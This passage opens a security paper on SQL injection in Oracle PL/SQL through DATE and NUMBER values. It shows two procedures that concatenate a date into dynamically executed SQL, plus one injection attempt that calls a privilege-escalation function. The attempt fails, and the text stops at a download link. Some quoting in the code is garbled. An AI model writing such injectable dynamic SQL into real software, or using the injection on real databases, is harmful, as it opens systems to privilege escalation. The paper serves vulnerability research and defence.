How can an attacker exploit a PL/SQL procedure that doesn’t even take user input? Or how does one do SQL injection using DATE or even NUMBER data types? In the past this has not been possible but as this paper will demonstrate, with a little bit of trickery, you can in the Oracle RDBMS. Consider the following code for a PL/SQL procedure:

create or replace procedure date_proc is
stmt varchar2(200);
v_date date:=sysdate;
begin
stmt:=’select object_name from all_objects where created = ”’ ||
v_date || ””;
dbms_output.put_line(stmt);
execute immediate stmt;
end;
/

It takes no parameters and so typically would not be audited. That said, we can see that the V_DATE variable is embedded within an SQL query which is then dynamically executed via the EXECUTE IMMEDIATE statement. Tracing back through the code we see that value for V_DATE is assigned from a call to the SYSDATE() built in function. If this were somehow influenceable then an attacker could potentially inject arbitrary SQL. As we will see this is fully exploitable but first let’s consider this code:

create or replace procedure date_proc_2(p_date) is
stmt varchar2(200);
begin
stmt:=’select object_name from all_objects where created = ”’ ||
p_date || ””;
dbms_output.put_line(stmt);
execute immediate stmt;
end;
/

The code here is similar to the code of the first procedure except this time the date is passed as a DATE type parameter. As DATE parameters are thought of as “safe” this procedure would probably not be audited. If we try to perform a typical SQL injection attack here, it fails because the parameter is a DATE and not a VARCHAR:

SQL> exec date_proc_2(”’ and scott.getdba()=1–’);
BEGIN date_proc(”’ and scott.getdba()=1–’); END;
ERROR at line 1:
ORA-01841: (full) year must be between -4713 and +9999, and not be 0
ORA-06512: at line 1

Download